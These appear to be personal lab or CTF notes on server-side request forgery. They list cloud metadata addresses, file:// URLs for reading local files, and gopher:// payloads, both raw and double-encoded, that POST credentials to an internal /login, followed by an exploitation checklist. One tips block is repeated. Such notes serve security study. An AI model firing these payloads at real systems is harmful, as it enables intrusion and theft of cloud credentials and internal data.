Tips:

  1. Remember to have Apache enabled first:
    sudo systemctl restart apache2

  2. Check your logs for connections:
    sudo tail /var/log/apache2/access.log

  3. Gopher related:
    • Have a shelf-prepared payload that requires the least possible changes: Pick a username and password that you know the post data length will be static. Therefore, you won’t need to change Content-Length each time.
    • Important note: If you are sending your SSRF payload through the web application itself, you’ll need to encode your payload once. If you are sending it through repeater, you’ll need to encode it twice.
    • Make sure the content-type field is correct.
    • If you have a consistent payload, you only need to change the URI and HOST field.
    • In post requests, there is 2 new lines between the HTTP header requests and post data (%0A%0A).
    • Gopher runs on port 70. Make sure to specify the correct port number in your URL. (edited)
  4. Just some general advice regarding SSRF:
    • Have a shelf-prepared payload that requires the least possible changes: Pick a username and password that you know the post data length will be static. Therefore, you won’t need to change Content-Length each time.
    • Important note: If you are sending your SSRF payload through the web application itself, you’ll need to encode your payload once. If you are sending it through repeater, you’ll need to encode it twice.
    • Make sure the content-type field is correct.
    • If you have a consistent payload, you only need to change the URI and HOST field.
    • In post requests, there is 2 new lines between the HTTP header requests and post data (%0A%0A).
    • Gopher runs on port 70. Make sure to specify the correct port number in your URL.
  5. Possible places: image that accepts URL, any search/add bar that accepts URL.

Internal Cloud Metadata:

AWS: 169.254.169.254
Google: metadata.google.internal

Different Protocols:

File (supported by curl but not Python):
file:///tmp/foo.txt
file:/tmp/foo.txt

Gopher:

This will create a gopher that uses GET HTTP request.
The additional _ added after port number is because Gopher automatically strips out the first character.
If you do this from Burp or curl, need to URL encode all non alphanumeric character, and need to double encode non alphanumeric characters below (like %20 will need to be %2520):
gopher://127.0.0.1:9000/_GET%20/hello_gopher%20HTTP/1.1

POST request:
gopher://127.0.0.1:80/_POST%20/status%20HTTP/1.1%0a

A normal POST request sent to the /login page, with username and password information, content length and content type (not URL encoded): gopher://backend:80/_POST%20/login%20HTTP/1.1%0d%0aHost:%20backend%0d%0aContent-Type:%20application%2fx-www-form-urlencoded%0d%0aContent-Length:%2041%0d%0a%0d%0ausername%3dwhite.rabbit%26password%3ddontbelate%0d%0a

The above when URL encoded twice: gopher%3A%2F%2Fbackend%3A80%2F_POST%2520%2Flogin%2520HTTP%2F1.1%250d%250aHost%3A%2520backend%250d%250aContent-Type%3A%2520application%252fx-www-form-urlencoded%250d%250aContent-Length%3A%252041%250d%250a%250d%250ausername%253dwhite.rabbit%2526password%253ddontbelate%250d%250a

SSRF scenario example exploitation:

  1. Find a place where the SSRF happens.
  2. Attempt to access a file and see if it works.
  3. If it doesnt, attempt to find a place if it will render other than the location in step 2.
  4. If still doesnt find another SSRF vulnerability.
  5. For example, if you find that image URL got SSRF, but it doesnt render and download properly in that same function, maybe go to some other places like contact info to see if can download and render.